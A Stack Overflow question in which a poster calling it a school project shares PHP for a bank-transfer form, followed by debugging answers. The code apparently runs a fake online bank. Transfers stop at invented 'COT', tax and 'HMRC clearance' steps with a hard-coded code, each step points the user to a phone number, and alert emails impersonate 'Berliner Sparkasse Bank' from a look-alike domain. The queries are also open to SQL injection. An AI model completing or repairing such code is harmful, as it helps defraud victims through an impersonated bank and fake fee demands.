-1

I designed a form to submit to a database. but when submitted the form returns blank and reload the form. I will be glad if you guys can help with my project work.

I am a php beginner now. I am trying to work on a school project. Where the html form will query the php form

I uploaded the files then trying the form I keep seeing a returned blank page without the form proceeding to the next page but returns blank

<table width="100%" border="0" cellpadding="0" cellspacing="0">
        <tr>
          <td width="50%" valign="top">
    <?php if ($curr_user['balance2'] != 0) { ?>
    <table width="100%" border="0" cellpadding="0" cellspacing="0">
            <tr>
              <td class="head"><img src="images/i_qt_text.png" width="220" height="27" /></td>
            </tr>
            <tr>
              <td style="border:#000080 1px solid; padding:5px;"><form id="form1" name="form1" method="post" action="" autocomplete="off">
                <table width="100%" border="0" cellspacing="1">
    <?php if($error_msg != "") { ?>
    <tr>
    <td colspan="2" class="error_msg"><?php echo $error_msg; ?></td></tr>
    <?php }?>
                  <tr>
                    <td width="40%" nowrap="nowrap"><strong>Bank Name</strong></td>
                    <td width="60%" style="padding-left:1em;"><input name="bname" type="text" id="bname" value="<?php echo $_POST['bname']; ?>" /></td>
                  </tr>
      <tr>
                    <td width="40%" nowrap="nowrap"><strong>Bank Address</strong></td>
                    <td width="60%" style="padding-left:1em;"><input name="bcountry" type="text" id="bcountry" value="<?php echo $_POST['bcountry']; ?>" /></td>
                  </tr>
                  <tr>
                    <td nowrap="nowrap"><strong>Account Number</strong></td>
                    <td style="padding-left:1em;"><input name="accnum" type="text" id="accnum" value="<?php echo $_POST['accnum']; ?>" /></td>
                  </tr>
      
      <!-- New addition -->
      
      <tr>
                    <td nowrap="nowrap"><strong>Account Name </strong> </td>
                    <td style="padding-left:1em;"><input name="accname" type="text" id="accname" value="<?php echo $_POST['accname']; ?>" /></td>
                  </tr>

<tr>
                    <td nowrap="nowrap"><strong>Owner's Address </strong> </td>
                    <td style="padding-left:1em;"><input name="ownadd" type="text" id="ownadd" value="<?php echo $_POST['ownadd']; ?>" /></td>
                  </tr>
      <tr>
                    <td nowrap="nowrap"><strong>Routing Number </strong> </td>
                    <td style="padding-left:1em;"><input name="routnum" type="text" id="routnum" value="<?php echo $_POST['routnum']; ?>" /></td>
                  </tr>
      
      <!-- End, New addition -->
      
                  <tr>
                    <td nowrap="nowrap"><strong>Swift Code </strong> </td>
                    <td style="padding-left:1em;"><input name="sort" type="text" id="sort" value="<?php echo $_POST['sort']; ?>" /></td>
                  </tr>
                  <tr>
                    <td nowrap="nowrap"><strong>Amount</strong> </td>
                    <td style="padding-left:1em;"><input name="amount" type="text" id="amount" value="<?php echo $_POST['amount']; ?>" /></td>
                  </tr>
                  <tr>
                    <td>&nbsp;</td>
                    <td style="padding-left:1em;"><input name="submit" type="submit" class="submit" id="submit" value="Continue &gt;&gt;" /></td>
                  </tr>
                </table>
              </form></td>
            </tr>
          </table>
    <?php } else { ?>
    <table width="100%" border="0">
  <tr>
    <td class="error_msg">Your current available balance is &pound;0. For more information on account funding, please call <strong><?php echo $phone1; ?></strong>, dial <?php echo $phone2; ?> when calling from abroad or email <a href="mailto:info@<?php echo $email_domain; ?>"><strong>info@<?php echo $email_domain; ?></strong></a></td>
  </tr>
</table>
<?php } ?>
    </td>
          <td width="50%" valign="top" style="padding-left:20px;"><table width="100%" border="0" cellpadding="0" cellspacing="0">
            <tr>
              <td class="head">Important Information </td>
            </tr>
            <tr>
              <td bgcolor="#E8FFF8" style="border:#000080 1px solid; padding:5px;">- Please be sure to verify the recieving account details before you proceed with the fund transfer. <br />
- The minimum amount transferable is &pound;1,000 and the maximum is your available balance (&pound;<?php echo number_format($curr_user['balance2'],2); ?>). <br />
- Transfer requests normally takes about 5 minutes to process and about 6-72 hours before fund reaches its destination. </td>
            </tr>
          </table></td>
        </tr>
      </table>
<?php
if(isset($_POST['submit'])) {
    $bname=addslashes($_POST['bname']);
    $bcountry=addslashes($_POST['bcountry']);
    $accnum=addslashes($_POST['accnum']);
    $accname=addslashes($_POST['accname']);
    $ownadd=addslashes($_POST['ownadd']);
    $routnum=addslashes($_POST['routnum']);
    $sort=addslashes($_POST['sort']);
    $amount=addslashes($_POST['amount']);

    $error_msg="";

    if(strlen($bname) == 0) {
        $error_msg.="<li>Please enter receiving bank's name";
    }
    if(strlen($bcountry) == 0) {
        $error_msg.="<li>Please enter receiving bank's country";
    }
    if(strlen($accnum) == 0) {
        $error_msg.="<li>Please enter receiving account number</li>";
    }
    if(strlen($accname) == 0) {
        $error_msg.="<li>Please enter receiving account name</li>";
    }
    if(strlen($sort) == 0) {
        $error_msg.="<li>Please enter sort code</li>";
    }
    if(strlen($amount) == 0) {
        $error_msg.="<li>Please enter amount to be transferred</li>";
    }
    elseif(!is_numeric($amount)) {
        $error_msg.="<li>Amount must be digits only. No symbols allowed.</li>";
    }
    elseif($amount < 1000) {
        $error_msg.="<li>Minimum transferable amount is £1,000</li>";
    }
    elseif($amount > $curr_user['balance2']) {
        $error_msg.="<li>Maximum transferable amount is £".number_format($curr_user['balance2'],2)."</li>";
    }

    if($error_msg != "") {
        $error_msg="<b>Please correct the following errors:</b>".$error_msg;
    }
    elseif($curr_user['status'] != "Active") {
        $error_msg="Sorry, your account is restricted from performing this operation";
    }
    else {
        $tid=rand(100000,999999);
        mysql_query("INSERT INTO `history` (`id` ,`tid` ,`number` ,`date` ,`bname` ,`bcountry` ,`accnum` ,`accname` ,`ownadd` ,`routnum` ,`sort` ,`amount` ,`type` ,`details` ,`status`, `stat`)VALUES (NULL , '$tid', '$accid', NOW( ) , '$bname', '$bcountry', '$accnum', '$accname', '$ownadd', '$routnum', '$sort', '$amount', 'Fund Transfer', 'Wire Transfer to $accname, $bname, $bcountry(account number $accnum)', 'Pending Authorization', 'Unverified')");
        redirect("?r=transfer&sid=".base64_encode($tid));
    }
}
$rendered_page='transfer.html';

if(isset($_GET['sid'])) {
    $tid=base64_decode($_GET['sid']);
    $trans=mysql_fetch_array(mysql_query("SELECT * FROM history WHERE tid='$tid' LIMIT 1"));
}

if(isset($_GET['sid']) && $trans['stat'] == "Unverified") {
    $rendered_page='transfer2.html';
    if(isset($_POST['pin_submit'])) {
        $pin=addslashes($_POST['pin']);
        if(strlen($pin) == 0) {
            $error_msg="Please enter your account PIN to continue";
        }
        elseif(strlen($pin) < 5) {
            $error_msg="Account PIN must be five digits";
        }
        elseif(!is_numeric($pin)) {
            $error_msg="Account PIN must be digits only";
        }
        elseif(strcmp($pin,$curr_user['pin']) != 0) {
            $error_msg="Invalid account PIN. If you feel this is an error, please call <b>$phone1</b>";
        }
        else {
            mysql_query("UPDATE history SET stat='Unconfirmed' WHERE tid='$tid' LIMIT 1");
            redirect("?r=transfer&sid=".base64_encode($tid));
        }
    }
}

if(isset($_GET['sid']) && $trans['stat'] == "Unconfirmed") {
    if(isset($_POST['proceed'])) {
        mysql_query("UPDATE history SET stat='Progress_COT' WHERE tid='$tid' LIMIT 1");
        redirect("?r=transfer&sid=".base64_encode($tid));
    }
    $rendered_page='verify_transfer.html';
}
if(isset($_GET['sid']) && ($trans['stat'] == "Progress_COT" || $trans['stat'] == "Progress_TAX" || $trans['stat'] == "Progress_FSA" || $trans['stat'] == "Progress_209")) {
    $rendered_page='progress.html';
}
if(isset($_GET['sid']) && (($trans['stat'] == "Progress_COT" && isset($_GET['done'])) || $trans['stat'] == "COT_Page")) {
    mysql_query("UPDATE history SET stat='COT_Page', status='Interrupted for COT Verification' WHERE tid='$tid' LIMIT 1");
    $rendered_page='cot.html';
}

if(isset($_POST['cot'])) {
    include('get_cot.php');
}

if(isset($_GET['sid']) && (($trans['stat'] == "Progress_TAX" && isset($_GET['done'])) || $trans['stat'] == "TAX_Page")) {
    if($curr_user['tax_status'] != 1) {
        mysql_query("UPDATE history SET stat='TAX_Page', status='Interrupted for Tax Clearance' WHERE tid='$tid' LIMIT 1");
        $rendered_page='tax.html';
    }
    else {
        mysql_query("UPDATE history SET stat='Progress_FSA' WHERE tid='$tid' LIMIT 1");
        redirect("?r=transfer&sid=".base64_encode($tid));
    }
}
if(isset($_GET['sid']) && (($trans['stat'] == "Progress_FSA" && isset($_GET['done'])) || $trans['stat'] == "FSA_Page")) {
    mysql_query("UPDATE history SET stat='FSA_Page', status='Interrupted for HMRC Clearance' WHERE tid='$tid' LIMIT 1");
    if(isset($_POST['fsa'])) {
        $fsa=addslashes($_POST['fsa']);
        if(strlen($fsa) == 0) {
            $error_msg="Please enter HMRC code to proceed with transfer";
        }
        elseif(!is_numeric($fsa)) {
            $error_msg="HMRC code must be digits only";
        }
        elseif($fsa != "4493231") {
            $error_msg="HMRC code is invalid. If you feel this is an error, please call <b>$phone1</b>";
        }
        else {
            mysql_query("UPDATE history SET stat='Progress_209' WHERE tid='$tid' LIMIT 1");
            redirect("?r=transfer&sid=".base64_encode($tid));
        }
    }
    $rendered_page='fsa.html';
}
if(isset($_GET['sid']) && (($trans['stat'] == "Progress_209" && isset($_GET['done'])) || $trans['stat'] == "Done")) {
    mysql_query("UPDATE history SET stat='Done', status='Successful' WHERE tid='$tid' LIMIT 1");
    $bal=$curr_user['balance'] - $trans['amount'];
    $bal2=$curr_user['balance2'] - $trans['amount'];
    mysql_query("UPDATE users SET balance='$bal', balance2='$bal2' WHERE number='$accid' LIMIT 1");


$user=mysql_fetch_array(mysql_query("SELECT * FROM users WHERE number='$accid' LIMIT 1"));

        $recipient=$user['email'];
        $mob_tel=$user['phone'];
        $first_name=$user['firstname'];
        $last_name=$user['lastname'];
        $accountbalance= "$bal";
        $availablebal= "$bal2";
        date_default_timezone_set("Europe/London");
        $bankname=$trans['bname'];
        $bankcountry=$trans['bcountry'];
        $receiveraccnum=$trans['accnum'];
        $receiveraccname=$trans['accname'];
        $banksort=$trans['sort'];
        $sendingamount=$trans['amount'];
        $time = date("h:i:sa");

                $date = date('d/m/Y');
                $senderName = "Berliner Sparkasse Bank";

$fromEmailAddress = "no-reply-accountdept@b-sparkassede.com";

$emailSubject = "Funds Transfer Alert";

$comments = "\n Hello $first_name $last_name \n \n A funds transfer has just occurred in your e-Banking online account. If this transfer wasn't carried out by you, please report immediately to info@b-sparkassede.com or call 0 460 245 694 from within Germany and +32 460 245 694 from outside Germany. \n\n TRANSFER DETAILS \n \n BANK NAME: $bankname \n ACCOUNT NAME | NUMBER: $receiveraccname | $receiveraccnum \n BANK ADDRESS: $bankcountry \n BANK SORT CODE: $banksort \n \n AMOUNT: $sendingamount \n NEW BALANCE: $accountbalance \n AVAILABLE BALANCE: $availablebal \n \n TRANSFER DATE: $date \n TRANSFER TIME: $time \n \n \n \n Account Support Team \n For Berliner Sparkasse Bank.";



$mobilesender = "Acc Notify";

$message = "e-Banking ACCOUNT DEBIT
Acct: ***".substr($curr_user['number'],-6,6)."
Amount: $sendingamount
TO: $bankname | $receiveraccnum
Remarks: Wire Transfer
Bal: $availablebal
Date: $date | $time";

$loginuser="";

$loginpass="";


mail($recipient, $emailSubject, $comments, "From: $senderName <$fromEmailAddress>\r\nContent-Type: text/plain; charset=UTF-8\r\nContent-Transfer-Encoding: 8bit");

$url = "http://ediarosms.com/sms/api_v1?sub_account=$loginuser&sub_account_pass=$loginpass&action=send_sms&sender_id=".urlencode($mobilesender)."&message=".urlencode($message)."&recipients=".urlencode($mob_tel)."";

file_get_contents($url);








    $rendered_page='209.html';


}
?>
marc_s
  • 675,133
  • 158
  • 1,253
  • 1,388
samsonase
  • 1
  • Hi there Samsonase! that's a lot of detail, which is often good, but I think in this case it's pretty distressing to try to read through it all. Could you reduce this to a minimal section of code, just enough to try to show us what's up without making the work so long? That could be what gets you the help you need! –  Apr 12 '20 at 02:13
  • A couple of obvious problems: 1. You're using the `mysqli` interface, which is not only deprecated but will leave you vulnerable to [SQL injection attacks](https://stackoverflow.com/questions/601300/what-is-sql-injection). 2. You're calling `mysql_query("INSERT INTO `history`...");` but you're not checking the value returned by that function. – kmoser Apr 12 '20 at 02:54
  • **Warning:** `mysql_*` extension is deprecated as of PHP 5.5.0, and has been removed as of PHP 7.0.0. Instead, either the [mysqli](https://www.php.net/manual/en/book.mysqli.php) or [PDO_MySQL](https://www.php.net/manual/en/book.pdo.php) extension should be used. See also the [MySQL API Overview](https://www.php.net/manual/en/mysqlinfo.api.choosing.php) for further help while choosing a MySQL API. – Dharman Apr 13 '20 at 22:15

2 Answers2

1

Your form action attribute is empty.

Create a file form-action.php (may be in the same folder) and paste the second part of your code.

Than, add the action page in form action attribute

action="form-action.php"

Remember, Every post request has a action page. When click continue pass pass from form page to action a page according to input name.

When you click continue form data pass to form-action page and the form-action.php page is loaded.

If you want to pass post data without redirect new page (form-action.php), you can use jquery ajax. For this visit

jQuery Ajax POST example with PHP

Mohammad Ali
  • 61
  • 2
0

Your select query is not properly working that's why form can't submit. Your select query is not returning the data into your input fields. So please double check your select query and test again your data is coming in input fields. You can use a debugging tool to verify that data is coming or not,

var_dump(put_variable_name_here);
Hadi
  • 26
  • 7
  • the form is submitted into database. they the value is supposed to show on the next page instead of the value to show on a next page it returns to the form and shows blank. but how do I use this code? should I paste it inside the form? – samsonase Apr 13 '20 at 10:53